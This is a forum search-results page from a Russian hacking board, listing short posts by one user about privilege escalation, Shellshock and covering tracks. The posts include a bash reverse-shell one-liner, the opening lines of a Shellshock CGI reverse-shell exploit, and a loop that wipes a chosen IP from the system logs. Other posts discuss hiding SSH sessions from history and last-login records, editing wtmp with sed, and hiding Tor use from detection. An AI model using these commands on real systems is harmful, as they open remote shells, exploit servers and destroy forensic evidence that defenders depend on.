Вернуться   RDot > Поиск по форуму

Показано с 1 по 21 из 21.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: dikiy
Раздел: Повышение привилегий/Privilege escalation 29.08.2015, 19:06
Ответов: 2
Просмотров: 5,612
Автор dikiy
Про суидник погугли

Про суидник погугли
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 26.08.2015, 17:27
Ответов: 1
Просмотров: 8,696
Автор dikiy
Запуск бэкконекта из sh скрипта

Подскажите команду, а то вставляю

/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

плюется еррорами дескрипторов
Раздел: Повышение привилегий/Privilege escalation 26.08.2015, 17:17
Ответов: 1,219
Просмотров: 666,402
Автор dikiy
Подскажите что нужно искать в выводе этих команд:...

Подскажите что нужно искать в выводе этих команд:


Ну и этих тоже в принципе.


Составили бы уже давно фак, чтобы люди сами искали, а не постили здесь простыни команд.
Раздел: Повышение привилегий/Privilege escalation 14.08.2015, 15:37
Ответов: 8
Просмотров: 9,544
Автор dikiy
Подскажите с компиляцией. Сыпятся ошибки:

Подскажите с компиляцией. Сыпятся ошибки:
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 10.11.2014, 04:12
Ответов: 4
Просмотров: 10,285
Автор dikiy
--host-timeout 6 --max-retries 0 --min-rate 1000

--host-timeout 6 --max-retries 0 --min-rate 1000
Раздел: Мировые новости/World news 19.10.2014, 03:34
Ответов: 8
Просмотров: 7,884
Автор dikiy
Да и по небось опенсорс типа...

Да и по небось опенсорс типа https://github.com/grugq/PORTALofPi
Раздел: Целевые системы/Target systems 06.10.2014, 04:11
Ответов: 26
Просмотров: 30,137
Автор dikiy
я в плеске ничего не нашел. удачи

я в плеске ничего не нашел. удачи
Раздел: Целевые системы/Target systems 02.10.2014, 16:07
Ответов: 26
Просмотров: 30,137
Автор dikiy
никак. вернее то, что есть это ерунда - позволяет...

никак. вернее то, что есть это ерунда - позволяет обойти ограничения на исполнение команд. Саму авторизацию шелшоком никак не обойти, OpenSSH в этом плане не уязвим.
Раздел: Целевые системы/Target systems 28.09.2014, 01:28
Ответов: 26
Просмотров: 30,137
Автор dikiy
В любых, где bash вызывается

В любых, где bash вызывается
Раздел: Целевые системы/Target systems 25.09.2014, 00:27
Ответов: 26
Просмотров: 30,137
Автор dikiy
Нашел пример # #CVE-2014-6271 cgi-bin...

Нашел пример
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>"...
Раздел: Целевые системы/Target systems 24.09.2014, 23:08
Ответов: 26
Просмотров: 30,137
Автор dikiy
Да, но переменная будет доступна только в томже...

Да, но переменная будет доступна только в томже процессе баша, либо в дочернем.
Раздел: Целевые системы/Target systems 24.09.2014, 18:11
Ответов: 26
Просмотров: 30,137
Автор dikiy
CVE: 2014-6271 Bash Specially-crafted Environment Variables Code Injection Vulnerabil

Принци понятен: мы можем создать переменную с функцией, добавить ее в окружение вместе с командами.
Но какой с этого прок, bash ведь не суидник. Какие векторы использования данной уязвимости?
Раздел: Инструментарий/Tools 21.08.2014, 11:07
Ответов: 4
Просмотров: 7,983
Автор dikiy
Насколько я понял, для маркировки нужно минимум...

Насколько я понял, для маркировки нужно минимум два условия: исходящий от нас тор трафик, снифер на уровне провайдера. тк тор идет через шифрованный socks, то провайдер не увидит тор трафик....
Раздел: Инструментарий/Tools 21.08.2014, 10:12
Ответов: 4
Просмотров: 7,983
Автор dikiy
Tor FAQ

Double Socks Tor (socks->tor->socks)

В связи с участившимися новостями о небезопасности сети tor, предлагаю простое решение, позволяющее обойти возможности детекта нашего подключения к сети tor, а...
Раздел: Целевые системы/Target systems 16.08.2014, 22:05
Ответов: 14
Просмотров: 23,821
Автор dikiy
ssh -T - в .bash_history, utmp, lastlog не...

ssh -T - в .bash_history, utmp, lastlog не попадаем.

Далее grep -rl 'ip' /var/log | while read F; do cp $F /tmp/$F; sed -i '/ip/d' /tmp/$F; cat /tmp/$F > /var/log/$F; rm -f /tmp/$F; done
Раздел: Релизы/Releases 10.07.2014, 16:05
Ответов: 17
Просмотров: 30,282
Автор dikiy
добавил в APACHE_PATH[] /var/log/secure.log, в...

добавил в APACHE_PATH[] /var/log/secure.log, в CentOS не хочет чистить, приходится отдельно затирать.
Раздел: *nix-like 05.07.2014, 16:45
Ответов: 167
Просмотров: 128,530
Автор dikiy
А как поднять соединение с tty, кроме методов...

А как поднять соединение с tty, кроме методов встроенных в всо2.5 ?
Раздел: Повышение привилегий/Privilege escalation 03.07.2014, 12:31
Ответов: 16
Просмотров: 17,117
Автор dikiy
euro, если еще актуально, посмотри значение...

euro, если еще актуально, посмотри значение "timestamp_timeout"
Раздел: Web development 03.07.2014, 08:42
Ответов: 319
Просмотров: 229,502
Автор dikiy
Можно ли как-то реализовать такой подход с eval? ...

Можно ли как-то реализовать такой подход с eval?

$com = 'eval';
$com($output);
--
PHP Fatal error: Call to undefined function eval()
Раздел: Оффтоп/Offtopic 25.07.2013, 21:32
Ответов: 7
Просмотров: 5,683
Автор dikiy
А что за Glebgor? не гуглится.

А что за Glebgor? не гуглится.
Раздел: Целевые системы/Target systems 25.07.2013, 21:17
Ответов: 17
Просмотров: 18,423
Автор dikiy
У меня sed чистит бинарники wtmp, пока проверял...

У меня sed чистит бинарники wtmp, пока проверял только на linux и centos. пробовал ли кто-нибудь? если работает, то все эти вайперы и клинеры нафиг не нужны.
Показано с 1 по 21 из 21.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot